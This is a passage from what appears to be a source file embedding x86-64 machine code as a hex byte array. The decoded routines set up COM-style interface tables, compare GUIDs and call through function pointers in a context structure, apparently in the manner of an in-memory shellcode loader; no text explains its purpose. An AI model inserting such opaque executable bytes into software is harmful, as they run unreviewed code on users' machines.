777 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00,
778 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
779 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00,
780 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01,
781 0x00, 0x00, 0x83, 0xbd, 0x9c, 0x01, 0x00, 0x00, 0x00, 0x75, 0x22, 0x48,
782 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
783 0x28, 0x48, 0x8b, 0x8d, 0x80, 0x01, 0x00, 0x00, 0xba, 0x02, 0x00, 0x00,
784 0x00, 0xff, 0xd0, 0x89, 0x85, 0x9c, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
785 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x10, 0x48,
786 0x8b, 0x95, 0x88, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
787 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40,
788 0x38, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff,
789 0xd0, 0x48, 0x8b, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
790 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x95, 0x80, 0x01, 0x00, 0x00, 0x48, 0x89,
791 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
792 0x80, 0x40, 0x07, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x01, 0x48, 0x8d, 0x14,
793 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xd0, 0xba,
794 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x14, 0x00, 0x00,
795 0x48, 0x8b, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48,
796 0x8b, 0x8d, 0xa0, 0x01, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00,
797 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x90, 0x48, 0x81, 0xc4, 0x30,
798 0x02, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
799 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
800 0x18, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00,
801 0x48, 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b,
802 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x69, 0x01, 0x00, 0x00,
803 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
804 0x8d, 0x15, 0x91, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b,
805 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf3, 0x02, 0x00, 0x00,
806 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
807 0x8d, 0x15, 0xae, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b,
808 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x08, 0x03, 0x00, 0x00,
809 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
810 0x8d, 0x15, 0x09, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b,
811 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x0e, 0x03, 0x00, 0x00,
812 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
813 0x8d, 0x15, 0x14, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b,
814 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xfc, 0x02, 0x00, 0x00,
815 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
816 0x8d, 0x15, 0xf9, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b,
817 0x45, 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
818 0xf8, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x50, 0x90, 0x48, 0x83,
819 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
820 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
821 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20,
822 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75, 0x48, 0x8b,
823 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xfc, 0x03, 0x00,
824 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48,
825 0x89, 0xc2, 0xe8, 0x85, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48,
826 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8d, 0x88, 0xac, 0x04,
827 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00,
828 0x48, 0x89, 0xc2, 0xe8, 0x60, 0x13, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x1b,
829 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x10, 0x48,
830 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00,
831 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00,
832 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x30, 0x5d,
833 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d,
834 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45,
835 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
836 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b,
837 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55,
838 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
839 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48,
840 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x55, 0xe8, 0xb8,
841 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f,
842 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x48, 0x83,
843 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30,
844 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20,
845 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
846 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85, 0xc0, 0x74, 0x39, 0x48, 0x83,
847 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x70,
848 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x00, 0x48,
849 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8b, 0x52, 0x28, 0x48,
850 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x50, 0x28,
851 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xe0,
852 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07,
853 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d, 0x48, 0x8b, 0x45, 0xf8, 0x48,
854 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0xf8, 0x48,
855 0x83, 0xc2, 0x18, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0xf8,
856 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10, 0xb8,
857 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48,
858 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
859 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa8,
860 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4, 0x00, 0x00, 0x00, 0x00, 0x48,
861 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00,
862 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x26, 0x11, 0x00, 0x00, 0x48, 0x8b,
863 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8d, 0x55,
864 0xb0, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d,
865 0xfc, 0x00, 0x75, 0x20, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48,
866 0x8b, 0x40, 0x20, 0x4c, 0x8d, 0x4d, 0xa4, 0x4c, 0x8d, 0x45, 0xa8, 0x48,
867 0x8d, 0x55, 0xac, 0x48, 0x8b, 0x4d, 0x18, 0xff, 0xd0, 0x89, 0x45, 0xfc,
868 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55,
869 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48,
870 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48,
871 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x40, 0x78, 0xff,
872 0xd0, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x18, 0x89, 0x10, 0xb8, 0x00, 0x00,
873 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
874 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00,
875 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
876 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0xb8, 0x00, 0x00, 0x00, 0x00,
877 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
878 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
879 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55,
880 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00,
881 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89,
882 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
883 0x00, 0x48, 0x8d, 0x15, 0xb2, 0x02, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48,
884 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x5d, 0x03, 0x00,
885 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
886 0x48, 0x8d, 0x15, 0x7d, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
887 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa4, 0x03, 0x00,
888 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
889 0x48, 0x8d, 0x15, 0xbd, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48,
890 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x06, 0x04, 0x00,
891 0x00, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
892 0x48, 0x8d, 0x15, 0x37, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
893 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x99, 0x04, 0x00,
894 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
895 0x48, 0x8d, 0x15, 0x9a, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48,
896 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9b, 0x04, 0x00,
897 0x00, 0x48, 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
898 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
899 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9d, 0x04, 0x00,
900 0x00, 0x48, 0x89, 0x50, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
901 0x48, 0x8d, 0x15, 0x9e, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x60, 0x48,
902 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xa1, 0x04, 0x00,
903 0x00, 0x48, 0x89, 0x50, 0x68, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
904 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x70, 0x48,
905 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00,
906 0x00, 0x48, 0x89, 0x50, 0x78, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
907 0x48, 0x8d, 0x15, 0xd5, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x80, 0x00,
908 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
909 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48,
910 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd1, 0x04, 0x00,
911 0x00, 0x48, 0x89, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
912 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xcf, 0x04, 0x00, 0x00, 0x48, 0x89,
913 0x90, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
914 0x48, 0x8d, 0x15, 0xcd, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa0, 0x00,
915 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
916 0xca, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xa8, 0x00, 0x00, 0x00, 0x48,
917 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xd0, 0x04, 0x00,
918 0x00, 0x48, 0x89, 0x90, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
919 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xce, 0x04, 0x00, 0x00, 0x48, 0x89,
920 0x90, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
921 0x48, 0x8d, 0x15, 0xd4, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc0, 0x00,
922 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
923 0xd2, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xc8, 0x00, 0x00, 0x00, 0x48,
924 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00,
925 0x00, 0x48, 0x89, 0x90, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
926 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xec, 0x04, 0x00, 0x00, 0x48, 0x89,
927 0x90, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00,
928 0x48, 0x8d, 0x15, 0xea, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe0, 0x00,
929 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
930 0xe8, 0x04, 0x00, 0x00, 0x48, 0x89, 0x90, 0xe8, 0x00, 0x00, 0x00, 0x48,
931 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
932 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x28, 0x48, 0x8b,
933 0x45, 0x10, 0x48, 0x8b, 0x80, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
934 0x18, 0x48, 0x83, 0xc2, 0x08, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
935 0xdc, 0x03, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc,
936 0x00, 0x75, 0x32, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48,
937 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
938 0x42, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x8a, 0x8c, 0x04, 0x00,
939 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c, 0x89, 0xca,
940 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x30,
941 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
942 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
943 0x7d, 0x20, 0x00, 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0x91,
944 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28, 0x48,
945 0x8d, 0x88, 0xfc, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8,
946 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xd4, 0x0d, 0x00, 0x00,
947 0x85, 0xc0, 0x74, 0x4a, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x28,
948 0x48, 0x8d, 0x88, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41,
949 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xaf, 0x0d, 0x00,
950 0x00, 0x85, 0xc0, 0x74, 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
951 0x28, 0x48, 0x8d, 0x88, 0x8c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
952 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x8a, 0x0d,
953 0x00, 0x00, 0x85, 0xc0, 0x75, 0x12, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b,
954 0x55, 0x10, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10,
955 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8,
956 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48,
957 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b,
958 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
959 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0, 0x0f, 0xc1, 0x10, 0x48,
960 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x20, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3,
961 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10,
962 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x20, 0x48, 0x89, 0x45, 0xf0,
963 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
964 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xfc,
965 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89,
966 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d,
967 0x18, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x0f, 0x48,
968 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00,
969 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
970 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c,
971 0x89, 0x4d, 0x28, 0x48, 0x83, 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03,
972 0x40, 0x00, 0x80, 0xeb, 0x30, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
973 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x55, 0x10,
974 0x48, 0x8b, 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x45,
975 0x10, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x45, 0x28, 0x48, 0x89, 0x10,
976 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
977 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48,
978 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48,
979 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48, 0x8b,
980 0x40, 0x50, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x10, 0x4c, 0x8b,
981 0x4d, 0x38, 0x44, 0x8b, 0x45, 0x28, 0x48, 0x8b, 0x55, 0x20, 0xff, 0xd0,
982 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
983 0xec, 0x60, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45,
984 0x20, 0x44, 0x89, 0x4d, 0x28, 0x8b, 0x45, 0x30, 0x66, 0x89, 0x45, 0xec,
985 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8b, 0x00, 0x48,
986 0x8b, 0x40, 0x58, 0x44, 0x0f, 0xb7, 0x4d, 0xec, 0x48, 0x8b, 0x55, 0x10,
987 0x48, 0x8b, 0x4a, 0x10, 0x44, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x50,
988 0x48, 0x89, 0x54, 0x24, 0x38, 0x48, 0x8b, 0x55, 0x48, 0x48, 0x89, 0x54,
989 0x24, 0x30, 0x48, 0x8b, 0x55, 0x40, 0x48, 0x89, 0x54, 0x24, 0x28, 0x48,
990 0x8b, 0x55, 0x38, 0x48, 0x89, 0x54, 0x24, 0x20, 0x48, 0x8b, 0x55, 0x10,
991 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x60,
992 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
993 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89,
994 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
995 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
996 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55,
997 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8,
998 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
999 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1000 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0xd0, 0x66,
1001 0x89, 0x45, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1002 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55,
1003 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00,
1004 0x48, 0x8b, 0x40, 0x70, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x8b, 0x4a, 0x18,
1005 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00,
1006 0xba, 0xfd, 0xff, 0xff, 0xff, 0xff, 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00,
